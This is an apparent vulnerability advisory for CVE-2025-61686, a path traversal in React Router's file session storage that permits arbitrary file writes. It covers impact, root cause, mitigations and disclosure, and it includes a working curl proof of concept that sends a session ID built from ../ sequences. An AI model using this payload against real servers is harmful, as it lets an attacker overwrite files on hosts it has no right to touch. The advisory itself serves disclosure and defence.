Severity: Critical (CVSS 9.1)
Class: Path Traversal
ID: CVE-2025-61686

Published 2025

Path Traversal in React Router File Session Storage

BugBunny.ai uncovered a path traversal issue in React Router's file session storage adapter. Crafted session IDs could escape the intended directory and overwrite arbitrary files on the host, impacting any deployment persisting sessions to disk.

Responsibly Disclosed

TL;DR

Arbitrary file write via session ID path traversal

Impact: Arbitrary file creation/overwrite on server filesystem
Vector: Crafted session ID with ../ sequences
Surface: React Router apps using file-based session storage
Status: Fixed via coordinated disclosure

Proof of Concept

curl -i -X POST https://<target>/__session/../../../../tmp/owned.json \
  -H "Content-Type: application/json" \
  -d '{
        "id":"../../../../tmp/owned.json",
        "data":{"role":"admin","note":"BugBunny was here"}
      }'

# Result: arbitrary file created/overwritten outside the session directory.

Root Cause

The file session storage adapter did not sanitize session IDs before constructing file paths. An attacker could supply a session ID containing path traversal sequences (../) to write session data to arbitrary locations on the filesystem.

Mitigation

  • Update to the patched version of React Router
  • Validate and sanitize session IDs before use
  • Consider using database-backed session storage instead of file-based

Credits & Disclosure

Identified by BugBunny.ai. The maintainers shipped a fix and coordinated disclosure via GitHub Security Advisories.

Reporter: BugBunny.ai
CVE: CVE-2025-61686
Affected package: 90M weekly downloads